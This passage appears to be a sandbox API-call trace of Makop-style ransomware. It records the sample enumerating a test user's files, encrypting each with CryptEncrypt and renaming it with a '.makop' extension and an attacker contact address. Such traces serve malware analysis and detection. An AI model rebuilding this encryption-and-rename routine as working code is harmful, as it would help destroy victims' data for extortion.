(in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b48e60, ftCreationTime.dwHighDateTime=0x1d5de1b, ftLastAccessTime.dwLowDateTime=0xce279110, ftLastAccessTime.dwHighDateTime=0x1d5d8fe, ftLastWriteTime.dwLowDateTime=0xce279110, ftLastWriteTime.dwHighDateTime=0x1d5d8fe, nFileSizeHigh=0x0, nFileSizeLow=0x46f9, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="SxrRj6p.mp4", cAlternateFileName="")) returned 1 [0127.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\SxrRj6p.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\sxrrj6p.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.708] GetProcessHeap () returned 0x550000 [0127.708] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.708] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.708] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.708] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0x7, lpOverlapped=0x0) returned 1 [0127.709] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.709] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.709] GetProcessHeap () returned 0x550000 [0127.709] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.709] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40) returned 1 [0127.709] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.709] WriteFile (in: hFile=0xa4, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fa08*=0x40, lpOverlapped=0x0) returned 1 [0127.709] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.709] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.709] WriteFile (in: hFile=0xa4, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.710] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.710] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.710] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.710] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.710] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.710] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0x46f9, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0x46f9, lpOverlapped=0x0) returned 1 [0127.710] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x4700, dwBufLen=0x4700 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x4700) returned 1 [0127.710] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.710] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x4700, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0x4700, lpOverlapped=0x0) returned 1 [0127.710] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.710] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x47d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.710] SetEndOfFile (hFile=0xa4) returned 1 [0127.713] GetProcessHeap () returned 0x550000 [0127.713] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.713] GetProcessHeap () returned 0x550000 [0127.713] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.713] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\SxrRj6p.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\sxrrj6p.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\SxrRj6p.mp4.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\sxrrj6p.mp4.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.716] CloseHandle (hObject=0xa4) returned 1 [0127.717] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47f4fff0, ftCreationTime.dwHighDateTime=0x1d5df3f, ftLastAccessTime.dwLowDateTime=0xc4612cd0, ftLastAccessTime.dwHighDateTime=0x1d5e061, ftLastWriteTime.dwLowDateTime=0xc4612cd0, ftLastWriteTime.dwHighDateTime=0x1d5e061, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="V-KeJ0wma0", cAlternateFileName="V-KEJ0~1")) returned 1 [0127.717] GetProcessHeap () returned 0x550000 [0127.717] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x92) returned 0x56a200 [0127.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47f4fff0, ftCreationTime.dwHighDateTime=0x1d5df3f, ftLastAccessTime.dwLowDateTime=0xc4612cd0, ftLastAccessTime.dwHighDateTime=0x1d5e061, ftLastWriteTime.dwLowDateTime=0xc4612cd0, ftLastWriteTime.dwHighDateTime=0x1d5e061, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName=".", cAlternateFileName="")) returned 0x56c9b0 [0127.717] GetProcessHeap () returned 0x550000 [0127.717] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56a200 | out: hHeap=0x550000) returned 1 [0127.717] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47f4fff0, ftCreationTime.dwHighDateTime=0x1d5df3f, ftLastAccessTime.dwLowDateTime=0xc4612cd0, ftLastAccessTime.dwHighDateTime=0x1d5e061, ftLastWriteTime.dwLowDateTime=0xc4612cd0, ftLastWriteTime.dwHighDateTime=0x1d5e061, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="..", cAlternateFileName="")) returned 1 [0127.718] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e917c80, ftCreationTime.dwHighDateTime=0x1d5de88, ftLastAccessTime.dwLowDateTime=0xbe465da0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xbe465da0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0xa89a, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="2419i.pptx", cAlternateFileName="2419I~1.PPT")) returned 1 [0127.718] GetProcessHeap () returned 0x550000 [0127.718] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x294) returned 0x593010 [0127.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\2419i.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\2419i.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.718] GetProcessHeap () returned 0x550000 [0127.718] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.718] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.718] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.718] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0x6, lpOverlapped=0x0) returned 1 [0127.719] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.719] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.719] GetProcessHeap () returned 0x550000 [0127.719] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0127.719] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30) returned 1 [0127.719] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.719] WriteFile (in: hFile=0x114, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245f780*=0x30, lpOverlapped=0x0) returned 1 [0127.720] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.720] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.720] WriteFile (in: hFile=0x114, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.720] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.720] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.720] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.720] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.720] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.720] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xa89a, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xa89a, lpOverlapped=0x0) returned 1 [0127.721] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xa8a0, dwBufLen=0xa8a0 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xa8a0) returned 1 [0127.721] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.721] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xa8a0, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xa8a0, lpOverlapped=0x0) returned 1 [0127.722] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.722] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0xa964, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.722] SetEndOfFile (hFile=0x114) returned 1 [0127.725] GetProcessHeap () returned 0x550000 [0127.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0127.725] GetProcessHeap () returned 0x550000 [0127.725] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.725] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\2419i.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\2419i.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\2419i.pptx.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\2419i.pptx.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.744] CloseHandle (hObject=0x114) returned 1 [0127.745] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5412cf0, ftCreationTime.dwHighDateTime=0x1d5de13, ftLastAccessTime.dwLowDateTime=0x671df630, ftLastAccessTime.dwHighDateTime=0x1d5d9c1, ftLastWriteTime.dwLowDateTime=0x671df630, ftLastWriteTime.dwHighDateTime=0x1d5d9c1, nFileSizeHigh=0x0, nFileSizeLow=0xed1, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="fA2b10WEFhj.swf", cAlternateFileName="FA2B10~1.SWF")) returned 1 [0127.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\fA2b10WEFhj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\fa2b10wefhj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.745] GetProcessHeap () returned 0x550000 [0127.745] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.745] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.745] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.745] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0xf, lpOverlapped=0x0) returned 1 [0127.746] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.746] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.747] GetProcessHeap () returned 0x550000 [0127.747] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.747] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f768*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f768*=0x40) returned 1 [0127.747] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.747] WriteFile (in: hFile=0x114, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245f780*=0x40, lpOverlapped=0x0) returned 1 [0127.747] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.747] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.747] WriteFile (in: hFile=0x114, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.747] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.747] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.747] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.747] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.747] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.748] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xed1, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xed1, lpOverlapped=0x0) returned 1 [0127.748] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xee0, dwBufLen=0xee0 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xee0) returned 1 [0127.748] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.748] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xee0, lpOverlapped=0x0) returned 1 [0127.748] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.748] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0xfb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.748] SetEndOfFile (hFile=0x114) returned 1 [0127.751] GetProcessHeap () returned 0x550000 [0127.751] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.751] GetProcessHeap () returned 0x550000 [0127.751] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.751] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\fA2b10WEFhj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\fa2b10wefhj.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\fA2b10WEFhj.swf.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\fa2b10wefhj.swf.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.752] CloseHandle (hObject=0x114) returned 1 [0127.758] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7492570, ftCreationTime.dwHighDateTime=0x1d5d8d0, ftLastAccessTime.dwLowDateTime=0xb4d271c0, ftLastAccessTime.dwHighDateTime=0x1d5db43, ftLastWriteTime.dwLowDateTime=0xb4d271c0, ftLastWriteTime.dwHighDateTime=0x1d5db43, nFileSizeHigh=0x0, nFileSizeLow=0x17bf5, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="srnAn8rQ66Z4.odt", cAlternateFileName="SRNAN8~1.ODT")) returned 1 [0127.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\srnAn8rQ66Z4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\srnan8rq66z4.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.758] GetProcessHeap () returned 0x550000 [0127.758] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.759] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.759] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.759] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0xb, lpOverlapped=0x0) returned 1 [0127.760] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.760] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.760] GetProcessHeap () returned 0x550000 [0127.760] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.760] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f768*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f768*=0x40) returned 1 [0127.760] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.760] WriteFile (in: hFile=0x114, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245f780*=0x40, lpOverlapped=0x0) returned 1 [0127.760] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.760] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.760] WriteFile (in: hFile=0x114, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.760] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.760] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.761] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.761] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.761] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.761] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0x17bf5, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0x17bf5, lpOverlapped=0x0) returned 1 [0127.762] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0x17c00, dwBufLen=0x17c00 | out: pbData=0x2250020*, 